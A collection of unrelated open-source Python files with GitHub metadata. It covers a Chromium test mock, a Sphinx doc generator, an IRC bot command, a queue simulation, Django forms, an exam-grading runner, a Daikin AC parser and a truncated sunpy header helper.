from blinkpy.common.path_finder import PathFinder
from blinkpy.common.system.system_host_mock import MockSystemHost
# New-style ports need to move down into blinkpy.common.
from blinkpy.web_tests.builder_list import BuilderList
from blinkpy.web_tests.port.factory import PortFactory
from blinkpy.web_tests.port.test import add_unit_tests_to_mock_filesystem
from blinkpy.w3c.wpt_manifest import BASE_MANIFEST_NAME
class MockHost(MockSystemHost):
def __init__(self,
log_executive=False,
web=None,
git=None,
os_name=None,
os_version=None,
time_return_val=123):
super(MockHost, self).__init__(
log_executive=log_executive,
os_name=os_name,
os_version=os_version,
time_return_val=time_return_val)
add_unit_tests_to_mock_filesystem(self.filesystem)
self._add_base_manifest_to_mock_filesystem(self.filesystem)
self.web = web or MockWeb()
self._git = git
self.results_fetcher = MockTestResultsFetcher()
# Note: We're using a real PortFactory here. Tests which don't wish to depend
# on the list of known ports should override this with a MockPortFactory.
self.port_factory = PortFactory(self)
self.builders = BuilderList({
'Fake Test Win10': {
'port_name': 'win-win10',
'specifiers': ['Win10', 'Release']
},
'Fake Test Linux': {
'port_name': 'linux-trusty',
'specifiers': ['Trusty', 'Release']
},
'Fake Test Linux (dbg)': {
'port_name': 'linux-trusty',
'specifiers': ['Trusty', 'Debug']
},
'Fake Test Mac10.12': {
'port_name': 'mac-mac10.12',
'specifiers': ['Mac10.12', 'Release'],
'is_try_builder': True,
},
'fake_blink_try_linux': {
'port_name': 'linux-trusty',
'specifiers': ['Trusty', 'Release'],
'is_try_builder': True,
},
'fake_blink_try_win': {
'port_name': 'win-win10',
'specifiers': ['Win10', 'Release'],
'is_try_builder': True,
},
'android_blink_rel': {
'bucket': 'luci.chromium.android',
'port_name': 'android-kitkat',
'specifiers': ['KitKat', 'Release'],
'is_try_builder': True,
},
})
def git(self, path=None):
if path:
return MockGit(
cwd=path,
filesystem=self.filesystem,
executive=self.executive,
platform=self.platform)
if not self._git:
self._git = MockGit(
filesystem=self.filesystem,
executive=self.executive,
platform=self.platform)
# Various pieces of code (wrongly) call filesystem.chdir(checkout_root).
# Making the checkout_root exist in the mock filesystem makes that chdir not raise.
self.filesystem.maybe_make_directory(self._git.checkout_root)
return self._git
def _add_base_manifest_to_mock_filesystem(self, filesystem):
path_finder = PathFinder(filesystem)
external_dir = path_finder.path_from_web_tests('external')
filesystem.maybe_make_directory(filesystem.join(external_dir, 'wpt'))
manifest_base_path = filesystem.join(external_dir, BASE_MANIFEST_NAME)
filesystem.files[manifest_base_path] = b'{"manifest": "base"}'
| {
"content_hash": "a7a91be66bb7da6bc88242107ce9f135",
"timestamp": "",
"source": "github",
"line_count": 99,
"max_line_length": 91,
"avg_line_length": 39.14141414141414,
"alnum_prop": 0.5641290322580645,
"repo_name": "scheib/chromium",
"id": "e81a7ef7b569c763316915733b7dd951e4284792",
"size": "5402",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "third_party/blink/tools/blinkpy/common/host_mock.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
"""
This script parse a directory tree looking for python modules and packages and
create ReST files appropriately to create code documentation with Sphinx.
It also create a modules index.
"""
import os
import optparse
# automodule options
OPTIONS = ['members',
'undoc-members',
# 'inherited-members', # disable because there's a bug in sphinx
'show-inheritance']
def create_file_name(base, opts):
"""Create file name from base name, path and suffix"""
return os.path.join(opts.destdir, "%s.%s" % (base, opts.suffix))
def write_directive(module, package=None):
"""Create the automodule directive and add the options"""
if package:
directive = '.. automodule:: %s.%s\n' % (package, module)
else:
directive = '.. automodule:: %s\n' % module
for option in OPTIONS:
directive += ' :%s:\n' % option
return directive
def write_heading(module, kind='Module'):
"""Create the page heading."""
module = module.title()
heading = title_line(module + ' Documentation', '=')
heading += 'This page contains the %s %s documentation.\n\n' % (module, kind)
return heading
def write_sub(module, kind='Module'):
"""Create the module subtitle"""
sub = title_line('The :mod:`%s` %s' % (module, kind), '-')
return sub
def title_line(title, char):
""" Underline the title with the character pass, with the right length."""
return '%s\n%s\n\n' % (title, len(title) * char)
def create_module_file(package, module, opts):
"""Build the text of the file and write the file."""
name = create_file_name(module, opts)
if not opts.force and os.path.isfile(name):
print 'File %s already exists.' % name
else:
print 'Creating file %s (module).' % name
text = write_heading(module)
text += write_sub(module)
text += write_directive(module, package)
# write the file
if not opts.dryrun:
fd = open(name, 'w')
fd.write(text)
fd.close()
def create_package_file(root, master_package, subroot, py_files, opts, subs=None):
"""Build the text of the file and write the file."""
package = os.path.split(root)[-1].lower()
name = create_file_name(subroot, opts)
if not opts.force and os.path.isfile(name):
print 'File %s already exists.' % name
else:
print 'Creating file %s (package).' % name
text = write_heading(package, 'Package')
if subs == None:
subs = []
else:
# build a list of directories that are package (they contain an __init_.py file)
subs = [sub for sub in subs if os.path.isfile(os.path.join(root, sub, '__init__.py'))]
# if there's some package directories, add a TOC for theses subpackages
if subs:
text += title_line('Subpackages', '-')
text += '.. toctree::\n\n'
for sub in subs:
text += ' %s.%s\n' % (subroot, sub)
text += '\n'
# add each package's module
for py_file in py_files:
if not check_for_code(os.path.join(root, py_file)):
# don't build the file if there's no code in it
continue
py_file = os.path.splitext(py_file)[0]
py_path = '%s.%s' % (subroot, py_file)
kind = "Module"
if py_file == '__init__':
kind = "Package"
text += write_sub(kind == 'Package' and package or py_file, kind)
text += write_directive(kind == "Package" and subroot or py_path, master_package)
text += '\n'
# write the file
if not opts.dryrun:
fd = open(name, 'w')
fd.write(text)
fd.close()
def check_for_code(module):
"""
Check if there's at least one class or one function in the module.
"""
fd = open(module, 'r')
for line in fd:
if line.startswith('def ') or line.startswith('class '):
fd.close()
return True
fd.close()
return False
def recurse_tree(path, excludes, opts):
"""
Look for every file in the directory tree and create the corresponding
ReST files.
"""
package_name = None
# check if the base directory is a package and get is name
if '__init__.py' in os.listdir(path):
package_name = os.path.abspath(path).split(os.path.sep)[-1]
toc = []
excludes = format_excludes(path, excludes)
tree = os.walk(path, False)
for root, subs, files in tree:
# keep only the Python script files
py_files = check_py_file(files)
# remove hidden ('.') and private ('_') directories
subs = [sub for sub in subs if sub[0] not in ['.', '_']]
# check if there's valid files to process
# TODO: could add check for windows hidden files
if "/." in root or "/_" in root \
or not py_files \
or check_excludes(root, excludes):
continue
subroot = root[len(path):].lstrip(os.path.sep).replace(os.path.sep, '.')
if root == path:
# we are at the root level so we create only modules
for py_file in py_files:
module = os.path.splitext(py_file)[0]
# add the module if it contains code
if check_for_code(os.path.join(path, '%s.py' % module)):
create_module_file(package_name, module, opts)
toc.append(module)
elif not subs and "__init__.py" in py_files:
# we are in a package without sub package
# check if there's only an __init__.py file
if len(py_files) == 1:
# check if there's code in the __init__.py file
if check_for_code(os.path.join(root, '__init__.py')):
create_package_file(root, package_name, subroot, py_files, opts=opts)
toc.append(subroot)
else:
create_package_file(root, package_name, subroot, py_files, opts=opts)
toc.append(subroot)
elif "__init__.py" in py_files:
# we are in package with subpackage(s)
create_package_file(root, package_name, subroot, py_files, opts, subs)
toc.append(subroot)
# create the module's index
if not opts.notoc:
modules_toc(toc, opts)
def modules_toc(modules, opts, name='modules'):
"""
Create the module's index.
"""
fname = create_file_name(name, opts)
if not opts.force and os.path.exists(fname):
print "File %s already exists." % name
return
print "Creating module's index modules.txt."
text = write_heading(opts.header, 'Modules')
text += title_line('Modules:', '-')
text += '.. toctree::\n'
text += ' :maxdepth: %s\n\n' % opts.maxdepth
modules.sort()
prev_module = ''
for module in modules:
# look if the module is a subpackage and, if yes, ignore it
if module.startswith(prev_module + '.'):
continue
prev_module = module
text += ' %s\n' % module
# write the file
if not opts.dryrun:
fd = open(fname, 'w')
fd.write(text)
fd.close()
def format_excludes(path, excludes):
"""
Format the excluded directory list.
(verify that the path is not from the root of the volume or the root of the
package)
"""
f_excludes = []
for exclude in excludes:
if not os.path.isabs(exclude) and exclude[:len(path)] != path:
exclude = os.path.join(path, exclude)
# remove trailing slash
f_excludes.append(exclude.rstrip(os.path.sep))
return f_excludes
def check_excludes(root, excludes):
"""
Check if the directory is in the exclude list.
"""
for exclude in excludes:
if root[:len(exclude)] == exclude:
return True
return False
def check_py_file(files):
"""
Return a list with only the python scripts (remove all other files).
"""
py_files = [fich for fich in files if os.path.splitext(fich)[1] == '.py']
return py_files
def main():
"""
Parse and check the command line arguments
"""
parser = optparse.OptionParser(usage="""usage: %prog [options] <package path> [exclude paths, ...]
Note: By default this script will not overwrite already created files.""")
parser.add_option("-n", "--doc-header", action="store", dest="header", help="Documentation Header (default=Project)", default="Project")
parser.add_option("-d", "--dest-dir", action="store", dest="destdir", help="Output destination directory", default="")
parser.add_option("-s", "--suffix", action="store", dest="suffix", help="module suffix (default=txt)", default="txt")
parser.add_option("-m", "--maxdepth", action="store", dest="maxdepth", help="Maximum depth of submodules to show in the TOC (default=4)", type="int", default=4)
parser.add_option("-r", "--dry-run", action="store_true", dest="dryrun", help="Run the script without creating the files")
parser.add_option("-f", "--force", action="store_true", dest="force", help="Overwrite all the files")
parser.add_option("-t", "--no-toc", action="store_true", dest="notoc", help="Don't create the table of content file")
(opts, args) = parser.parse_args()
if len(args) < 1:
parser.error("package path is required.")
else:
if os.path.isdir(args[0]):
# check if the output destination is a valid directory
if opts.destdir and os.path.isdir(opts.destdir):
# if there's some exclude arguments, build the list of excludes
excludes = args[1:]
recurse_tree(args[0], excludes, opts)
else:
print '%s is not a valid output destination directory.' % opts.destdir
else:
print '%s is not a valid directory.' % args
if __name__ == '__main__':
main()
| {
"content_hash": "8ddae5aa75e5f0300c0f4f84a9e289f9",
"timestamp": "",
"source": "github",
"line_count": 267,
"max_line_length": 164,
"avg_line_length": 37.951310861423224,
"alnum_prop": 0.5755452481989539,
"repo_name": "pombreda/pyamg",
"id": "7606a403fc1aebaea27365347e5dd7d1023f162b",
"size": "10921",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "Docs/sphinxext/generate_modules.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C++",
"bytes": "1112880"
},
{
"name": "CSS",
"bytes": "9832"
},
{
"name": "Makefile",
"bytes": "3249"
},
{
"name": "Matlab",
"bytes": "2742"
},
{
"name": "Python",
"bytes": "1215339"
},
{
"name": "Shell",
"bytes": "558"
},
{
"name": "TeX",
"bytes": "232"
}
],
"symlink_target": ""
} |
import json
import urllib
import datetime
from gdata.youtube import service
from utils.text import style
from commands import Command
class youtube(Command):
syntax = "Syntax %s %s" % (
style.bold("!youtube"),
style.underline("phrase"))
def __init__(self, *args, **kwargs):
Command.__init__(self, *args, **kwargs)
if not self.args:
return self.message(self.syntax, self.user)
query = service.YouTubeVideoQuery()
query.vq = ' '.join(self.args)
feed = service.YouTubeService().YouTubeQuery(query)
if not feed.entry:
return self.message("No YouTube results for \"%s\"" % query.vq, self.user)
video = feed.entry[0].media
title = video.title.text
duration = datetime.timedelta(seconds=int(video.duration.seconds))
url = video.player.url.split('&')[0]
self.message("%s [%s] (%s)" % (title, duration, url), self.user)
| {
"content_hash": "e7166fd46e748cf9c6f692220e388d97",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 86,
"avg_line_length": 29.606060606060606,
"alnum_prop": 0.601842374616172,
"repo_name": "ryonsherman/rcbot",
"id": "7edd7f3053af179160b5b856711a652d15a7a26e",
"size": "1001",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "commands/global/youtube.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "12217"
}
],
"symlink_target": ""
} |
from queue import PriorityQueue
import math
import random
from app.logic.incoming_event import IncomingEvent
from app.logic.outcoming_event import OutcomingEvent
from app.logic.device import Device
from app.logic.request import Request
class Model:
work_time = None
interval_time = None
event_list = None
model_time = None
@staticmethod
def initialize(work_time_value):
Model.work_time = work_time_value
Model.model_time = 0
Model.interval_time = 60
Model.event_list = PriorityQueue()
Model.add_event(IncomingEvent(0.0))
Model.device = Device(30, 70)
@staticmethod
def start():
while Model.model_time < Model.work_time:
present_event = Model.get_event()
Model.model_time = present_event.time
present_event.handle_self(Model)
@staticmethod
def add_event(event):
Model.event_list.put(event)
@staticmethod
def get_event():
return Model.event_list.get()
@staticmethod
def get_exp_interval():
return (-1) * math.log(1 - random.random()) * Model.interval_time
@staticmethod
def handle_incoming_event(time):
event_time = time + Model.get_exp_interval()
Model.add_event(IncomingEvent(event_time))
current_request_number = Model.device.next_request_number
request = Request(current_request_number, time)
if Model.device.present_request != None:
Model.device.add_request(request)
else:
Model.process_device(request)
#log function
print('[handle an incoming event]\t\t{0} sec.'.format(event_time))
@staticmethod
def handle_outcoming_event(time):
Model.device.present_request = None
if not Model.device.is_empty_request_queue():
request = Model.device.remove_request()
Model.process_device(request)
else:
Model.device.present_request = None
#log function
print('[handling an outcoming event]\t\t{0} sec.'.format(time))
@staticmethod
def process_device(request):
Model.device.present_request = request
Model.device.next_request_number += 1
time = Model.device.get_processing_time()
total_time = Model.model_time - request.time
Model.add_event(OutcomingEvent(Model.model_time + total_time))
#log function
print('[processing the device]\t\t\trequest #{0}'.format(request.number))
| {
"content_hash": "1eaa2211561d38e3c8e5fdc7a72f28b5",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 81,
"avg_line_length": 32.41558441558441,
"alnum_prop": 0.6430288461538461,
"repo_name": "ordinary-developer/modelling_1",
"id": "ab2499603edcb5960a519e79b246a3d9284dfb8f",
"size": "2496",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/logic/model.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "8728"
}
],
"symlink_target": ""
} |
from django import forms
from django.forms import HiddenInput
from django.forms import formset_factory
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Layout, Div, HTML, Submit
from crispy_forms.bootstrap import FormActions
from selectable import forms as selectable
from workshops.models import Skill, Airport, Event, Task, Award, Person
from workshops import lookups
INSTRUCTOR_SEARCH_LEN = 10 # how many instrutors to return from a search by default
AUTOCOMPLETE_HELP_TEXT = (
"Autocomplete field; type characters to view available options, "
"then select desired item from list."
)
DATE_HELP_TEXT = "Select date using widget, or enter in YYYY-MM-DD format."
class BootstrapHelper(FormHelper):
form_class = 'form-horizontal'
label_class = 'col-lg-2'
field_class = 'col-lg-8'
def __init__(self, form=None):
super().__init__(form)
self.attrs['role'] = 'form'
self.inputs.append(Submit('submit', 'Submit'))
class BootstrapHelperWithAdd(BootstrapHelper):
def __init__(self, form=None):
super().__init__(form)
self.inputs[-1] = Submit('submit', 'Add')
class BootstrapHelperFilter(FormHelper):
form_method = 'get'
def __init__(self, form=None):
super().__init__(form)
self.attrs['role'] = 'form'
self.inputs.append(Submit('', 'Submit'))
bootstrap_helper = BootstrapHelper()
bootstrap_helper_with_add = BootstrapHelperWithAdd()
bootstrap_helper_filter = BootstrapHelperFilter()
class InstructorsForm(forms.Form):
'''Represent instructor matching form.'''
wanted = forms.IntegerField(label='Number Wanted',
initial=INSTRUCTOR_SEARCH_LEN,
min_value=1)
latitude = forms.FloatField(label='Latitude',
min_value=-90.0,
max_value=90.0,
required=False)
longitude = forms.FloatField(label='Longitude',
min_value=-180.0,
max_value=180.0,
required=False)
airport = selectable.AutoCompleteSelectField(
lookup_class=lookups.AirportLookup,
label='Airport',
required=False,
widget=selectable.AutoComboboxSelectWidget(
lookup_class=lookups.AirportLookup,
),
)
def __init__(self, *args, **kwargs):
'''Build checkboxes for skills dynamically.'''
super(InstructorsForm, self).__init__(*args, **kwargs)
self.helper = FormHelper(self)
self.helper.form_class = 'form-inline'
self.helper.layout = Layout(
'wanted',
Div(
Div(
'latitude',
'longitude',
css_class='col-sm-6'
),
Div(
HTML('<br><strong>OR</strong>'),
css_class='col-sm-2',
),
Div(
'airport',
css_class='col-sm-4'
),
css_class='row panel panel-default panel-body',
),
HTML('<label class="control-label">Skills</label>'),
FormActions(
Submit('submit', 'Submit'),
),
)
skills = Skill.objects.all()
for s in skills:
self.fields[s.name] = forms.BooleanField(label=s.name, required=False)
self.helper.layout.insert(3, s.name)
def clean(self):
cleaned_data = super(InstructorsForm, self).clean()
airport = cleaned_data.get('airport')
lat = cleaned_data.get('latitude')
long = cleaned_data.get('longitude')
if airport is None:
if lat is None or long is None:
raise forms.ValidationError(
'Must specify either an airport code or latitude/longitude')
else:
if lat is not None or long is not None:
raise forms.ValidationError(
'Cannot specify both an airport code and a '
'latitude/longitude. Pick one or the other')
cleaned_data['latitude'] = airport.latitude
cleaned_data['longitude'] = airport.longitude
return cleaned_data
class PersonBulkAddForm(forms.Form):
'''Represent CSV upload form for bulk adding people.'''
file = forms.FileField()
class SearchForm(forms.Form):
'''Represent general searching form.'''
term = forms.CharField(label='term',
max_length=100)
in_sites = forms.BooleanField(label='in sites',
required=False,
initial=True)
in_events = forms.BooleanField(label='in events',
required=False,
initial=True)
in_persons = forms.BooleanField(label='in persons',
required=False,
initial=True)
in_airports = forms.BooleanField(label='in airports',
required=False,
initial=True)
class DebriefForm(forms.Form):
'''Represent general debrief form.'''
begin_date = forms.DateField(
label='Begin date as YYYY-MM-DD',
input_formats=['%Y-%m-%d', ]
)
end_date = forms.DateField(
label='End date as YYYY-MD-DD',
input_formats=['%Y-%m-%d', ]
)
class EventForm(forms.ModelForm):
site = selectable.AutoCompleteSelectField(
lookup_class=lookups.SiteLookup,
label='Site',
required=True,
help_text=AUTOCOMPLETE_HELP_TEXT,
widget=selectable.AutoComboboxSelectWidget,
)
organizer = selectable.AutoCompleteSelectField(
lookup_class=lookups.SiteLookup,
label='Organizer',
required=False,
help_text=AUTOCOMPLETE_HELP_TEXT,
widget=selectable.AutoComboboxSelectWidget,
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['start'].help_text = DATE_HELP_TEXT
self.fields['end'].help_text = DATE_HELP_TEXT
def clean_slug(self):
# Ensure slug is not an integer value for Event.get_by_ident
data = self.cleaned_data['slug']
try:
int(data)
except ValueError:
pass
else:
raise forms.ValidationError("Slug must not be an integer-value.")
return data
class Meta:
model = Event
# reorder fields, don't display 'deleted' field
fields = ('slug', 'start', 'end', 'site', 'organizer',
'tags', 'url', 'reg_key', 'admin_fee', 'invoiced',
'attendance', 'notes')
class TaskForm(forms.ModelForm):
person = selectable.AutoCompleteSelectField(
lookup_class=lookups.PersonLookup,
label='Person',
required=True,
help_text=AUTOCOMPLETE_HELP_TEXT,
widget=selectable.AutoComboboxSelectWidget,
)
class Meta:
model = Task
fields = '__all__'
widgets = {'event': HiddenInput}
class TaskFullForm(TaskForm):
event = selectable.AutoCompleteSelectField(
lookup_class=lookups.EventLookup,
label='Event',
required=True,
help_text=AUTOCOMPLETE_HELP_TEXT,
widget=selectable.AutoComboboxSelectWidget,
)
class Meta:
model = Task
fields = '__all__'
class PersonForm(forms.ModelForm):
airport = selectable.AutoCompleteSelectField(
lookup_class=lookups.AirportLookup,
label='Airport',
required=False,
help_text=AUTOCOMPLETE_HELP_TEXT,
widget=selectable.AutoComboboxSelectWidget,
)
class Meta:
model = Person
# don't display the 'password', 'user_permissions',
# 'groups' or 'is_superuser' fields
# + reorder fields
fields = ['username', 'personal', 'middle', 'family', 'may_contact',
'email', 'gender', 'airport', 'github', 'twitter', 'url',
'notes', ]
class PersonPermissionsForm(forms.ModelForm):
class Meta:
model = Person
# only display 'user_permissions', 'groups' and `is_superuser` fields
fields = [
'is_superuser',
'user_permissions',
'groups',
]
class BadgeAwardForm(forms.ModelForm):
person = selectable.AutoCompleteSelectField(
lookup_class=lookups.PersonLookup,
label='Person',
required=True,
help_text=AUTOCOMPLETE_HELP_TEXT,
widget=selectable.AutoComboboxSelectWidget,
)
event = selectable.AutoCompleteSelectField(
lookup_class=lookups.EventLookup,
label='Event',
required=False,
help_text=AUTOCOMPLETE_HELP_TEXT,
widget=selectable.AutoComboboxSelectWidget,
)
class Meta:
model = Award
fields = '__all__'
widgets = {'badge': HiddenInput}
class PersonAwardForm(forms.ModelForm):
event = selectable.AutoCompleteSelectField(
lookup_class=lookups.EventLookup,
label='Event',
required=False,
help_text=AUTOCOMPLETE_HELP_TEXT,
widget=selectable.AutoComboboxSelectWidget,
)
class Meta:
model = Award
fields = '__all__'
widgets = {'person': HiddenInput}
| {
"content_hash": "ac7a7c98eaf5206f7bbc804a74909db2",
"timestamp": "",
"source": "github",
"line_count": 312,
"max_line_length": 85,
"avg_line_length": 30.57051282051282,
"alnum_prop": 0.5712937722793039,
"repo_name": "shapiromatron/amy",
"id": "f8e25e295d3dadde78417623a85b7471df1abb30",
"size": "9538",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "workshops/forms.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1332"
},
{
"name": "HTML",
"bytes": "43835"
},
{
"name": "Makefile",
"bytes": "2641"
},
{
"name": "PLpgSQL",
"bytes": "3667538"
},
{
"name": "Python",
"bytes": "222271"
},
{
"name": "Shell",
"bytes": "373"
}
],
"symlink_target": ""
} |
from file_preprocessor import FileView
from subprocess import Popen, PIPE, STDOUT
import tempfile
import os
import json
def franken_interpreter(file_view, user_solutions, file_pointer):
in_question = False
for line_data in file_view.line_datas:
if 'macro' in line_data:
if line_data['text'][0:18] == '@@ begin question ' and \
line_data['text'][18:-1] in user_solutions:
in_question = True
file_pointer.write(
user_solutions[line_data['text'][18:-1]])
if line_data['text'][0:15] == '@@ end question':
in_question = False
elif not in_question:
file_pointer.write(line_data['text'])
def run_user_solution(user_solutions, command, exam_config, stdin_input):
base_dir = os.getcwd()
with tempfile.TemporaryDirectory() as compiler_folder:
for file_name in exam_config['file_list']:
if os.path.dirname(file_name) != str():
os.makedirs(compiler_folder + "\\" +
os.path.dirname(file_name), exist_ok=True)
with open(compiler_folder + "\\" + file_name, mode="w") \
as compiler_input:
with open(file_name) as code_file:
franken_interpreter(FileView(code_file),
user_solutions, compiler_input)
os.chdir(compiler_folder)
p = Popen(command, stdout=PIPE, stdin=PIPE, stderr=STDOUT)
try:
stdout = p.communicate(
input=stdin_input.encode('utf-8'), timeout=10)[0]
except TimeoutError:
p.kill()
stdout = p.communicate()[0]
os.chdir(base_dir)
return stdout
def evaluate_user_solution(user_solutions, exam_config):
quest_dict = {}
for test_file in exam_config['test_list']:
with open(test_file) as test_config:
test_cases = json.loads(test_config.read())
for test_case in test_cases:
expected = run_user_solution(
{}, test_case['run'], exam_config, test_case['input'])
user_inputs = {}
for key, value in user_solutions.items():
if key in test_case['questions']:
user_inputs[key] = value
actual = run_user_solution(user_inputs,
test_case['run'],
exam_config,
test_case['input'])
if actual[0] == expected[0]:
message = "Test case passed: +{} Points".format(test_case[
'points'])
score = test_case['points']
else:
message = \
"Expected:\n {}".format(expected[0]) + \
"\n\nActual:\n{}".format(actual[0])
score = 0
for quest_name in test_case['questions']:
if quest_name not in quest_dict:
quest_dict[quest_name] = \
{'real_test_score': score,
'max_test_score': test_case['points'],
'name': quest_name,
'real_question_score':
50 if score == test_case['points'] else 0,
'max_question_score': 50,
'message': message
}
else:
past_data = quest_dict[quest_name]
past_data['real_test_score'] += score
past_data['max_test_score'] += test_case['points']
if score != test_case['points']:
past_data['real_question_score'] = 0
past_data['message'] += ('\n\n' + message)
quest_dict[quest_name] = past_data
return quest_dict
| {
"content_hash": "3868382dd3273bc568ba18958e85a6aa",
"timestamp": "",
"source": "github",
"line_count": 97,
"max_line_length": 78,
"avg_line_length": 42.1958762886598,
"alnum_prop": 0.46713901783532863,
"repo_name": "RaphaelArkadyMeyer/LiveCoding",
"id": "1912c3966a89067d2d7e1191b4c648c9aa47aeaa",
"size": "4093",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Server Side/frankencompiler.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "251"
},
{
"name": "C",
"bytes": "128"
},
{
"name": "C++",
"bytes": "1785"
},
{
"name": "Python",
"bytes": "23096"
}
],
"symlink_target": ""
} |
import logging
import urllib
log = logging.getLogger(__name__)
def parse_basic_info(x):
integers = ['port', 'err', 'pv']
booleans = ['pow', 'led']
parse_data(x, integers=integers, booleans=booleans)
x['name'] = urllib.parse.unquote(x['name'])
return x
def parse_sensor_info(x):
integers = ['err']
temps = ['hhum', 'htemp', 'otemp']
parse_data(x, integers=integers, temps=temps)
return x
ctrl_integers = ['alert', 'mode', 'b_mode']
ctrl_temps = ['shum', 'stemp', 'b_shum']
ctrl_booleans = ['pow']
def parse_control_info(x):
parse_data(x, integers=ctrl_integers, temps=ctrl_temps, booleans=ctrl_booleans)
return x
def format_control_info(x):
format_data(x, integers=ctrl_integers, temps=ctrl_temps, booleans=ctrl_booleans)
return x
def parse_data(x, integers=[],
booleans=[],
temps=[]):
for field in integers:
try:
x[field] = int(x[field])
except ValueError as e:
log.exception("failed to parse field '{}': {}".format(field, e.message))
for field in booleans:
try:
x[field] = bool(int(x[field]))
except ValueError as e:
log.exception("Failed to parse field '{}': {}".format(field, e.message))
for field in temps:
try:
x[field] = parse_temperature(x[field])
except ValueError:
log.exception(("Failed to parse field {{'{}':'{}'}}."
"A temperature was expected").format(field, x[field]))
pass
def format_data(x, strict=True,
integers=[],
booleans=[],
temps=[]):
for field in integers:
try:
x[field] = str(int(x[field]))
except KeyError:
if not strict:
pass
for field in booleans:
try:
x[field] = str(int(bool(x[field])))
except KeyError:
if not strict:
pass
for field in temps:
try:
x[field] = str(float(x[field]))
except KeyError:
if not strict:
pass
def parse_temperature(temp):
try:
return float(temp)
except ValueError:
if temp == '-' or temp == '--':
return None
else:
raise
| {
"content_hash": "9d77d0eb0e843bbd6b2bbe4d1767a9ce",
"timestamp": "",
"source": "github",
"line_count": 95,
"max_line_length": 84,
"avg_line_length": 24.926315789473684,
"alnum_prop": 0.5219594594594594,
"repo_name": "ael-code/daikin-aricon-pylib",
"id": "be99f598482d86d7a7f672e386d254c0ba4076d3",
"size": "2368",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bridge.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "9071"
}
],
"symlink_target": ""
} |
import warnings
import numpy as np
import astropy.units as u
import astropy.wcs
from astropy.coordinates import SkyCoord
from sunpy.coordinates import frames
from sunpy.util import MetaDict
from sunpy.util.exceptions import SunpyUserWarning
__all__ = ['meta_keywords', 'make_fitswcs_header']
def meta_keywords():
"""
Returns the metadata keywords that are used when creating a `sunpy.map.GenericMap`.
Examples
--------
Returns a dictionary of all meta keywords that are used in a `sunpy.map.GenericMap` header:
>>> import sunpy.map
>>> sunpy.map.meta_keywords()
{'cunit1': 'Units of the coordinate increments along naxis1 e.g. arcsec **required',
'cunit2': 'Units of the coordinate increments along naxis2 e.g. arcsec **required',
...
"""
return _map_meta_keywords
@u.quantity_input(equivalencies=u.spectral())
def make_fitswcs_header(data, coordinate, reference_pixel: u.pix = None,
scale: u.arcsec/u.pix = None,
rotation_angle: u.deg = None,
rotation_matrix=None, instrument=None,
telescope=None, observatory=None,
wavelength: u.angstrom=None, exposure: u.s=None):
"""
Function to create a FITS-WCS header from a coordinate object
(`~astropy.coordinates.SkyCoord`) that is required to
create a `~sunpy.map.GenericMap`.
Parameters
----------
data : `~numpy.ndarray`
Array data of Map for which a header is required.
coordinates : `~astropy.coordinates.SkyCoord` or `~astropy.coordinates.BaseFrame`
Coordinate object to get meta information for map header.
reference_pixel :`~astropy.units.Quantity` of size 2, optional
Reference pixel along each axis. These are expected to be Cartestian ordered, i.e
the first index is the x axis, second index is the y axis. Defaults to
the center of data array, ``(data.shape[1] - 1)/2., (data.shape[0] - 1)/2.)``,
this argument is zero indexed (Python convention) not 1 indexed (FITS
convention).
scale : `~astropy.units.Quantity` of size 2, optional
Pixel scaling along x and y axis (i.e. the spatial scale of the pixels (dx, dy)). These are
expected to be Cartestian ordered, i.e [dx, dy].
Defaults to ``([1., 1.] arcsec/pixel)``.
rotation_angle : `~astropy.unit.Quantity`, optional
Coordinate system rotation angle, will be converted to a rotation
matrix and stored in the ``PCi_j`` matrix. Can not be specified with
``rotation_matrix``.
rotation_matrix : `~numpy.ndarray` of dimensions 2x2, optional
Matrix describing the rotation required to align solar North with
the top of the image in FITS ``PCi_j`` convention. Can not be specified
with ``rotation_angle``.
instrument : `~str`, optional
Name of the instrument of the observation.
telescope : `~str`, optional
Name of the telescope of the observation.
observatory : `~str`, optional
Name of the observatory of the observation.
wavelength : `~u.Quantity`, optional
Wavelength of the observation as an astropy quanitity, e.g. 171*u.angstrom.
From this keyword, the meta keywords ``wavelnth`` and ``waveunit`` will be populated.
exposure : `~u.Quantity`, optional
Exposure time of the observation
Returns
-------
`~sunpy.util.MetaDict`
The header information required for making a `sunpy.map.GenericMap`.
Examples
--------
>>> import sunpy.map
>>> from sunpy.coordinates import frames
>>> from astropy.coordinates import SkyCoord
>>> import astropy.units as u
>>> import numpy as np
>>> data = np.random.rand(1024, 1024)
>>> my_coord = SkyCoord(0*u.arcsec, 0*u.arcsec, obstime="2017-08-01",
... observer = 'earth', frame=frames.Helioprojective)
>>> my_header = sunpy.map.make_fitswcs_header(data, my_coord)
>>> my_map = sunpy.map.Map(data, my_header)
"""
if not isinstance(coordinate, (SkyCoord, frames.BaseCoordinateFrame)):
raise ValueError("coordinate needs to be a coordinate frame or an SkyCoord instance.")
if isinstance(coordinate, SkyCoord):
coordinate = coordinate.frame
if coordinate.obstime is None:
raise ValueError("The coordinate needs an observation time, `obstime`.")
if isinstance(coordinate, frames.Heliocentric):
raise ValueError("This function does not currently support heliocentric coordinates.")
meta_wcs = _get_wcs_meta(coordinate)
if hasattr(coordinate, "observer") and isinstance(coordinate.observer, frames.BaseCoordinateFrame):
meta_observer = _get_observer_meta(coordinate)
meta_wcs.update(meta_observer)
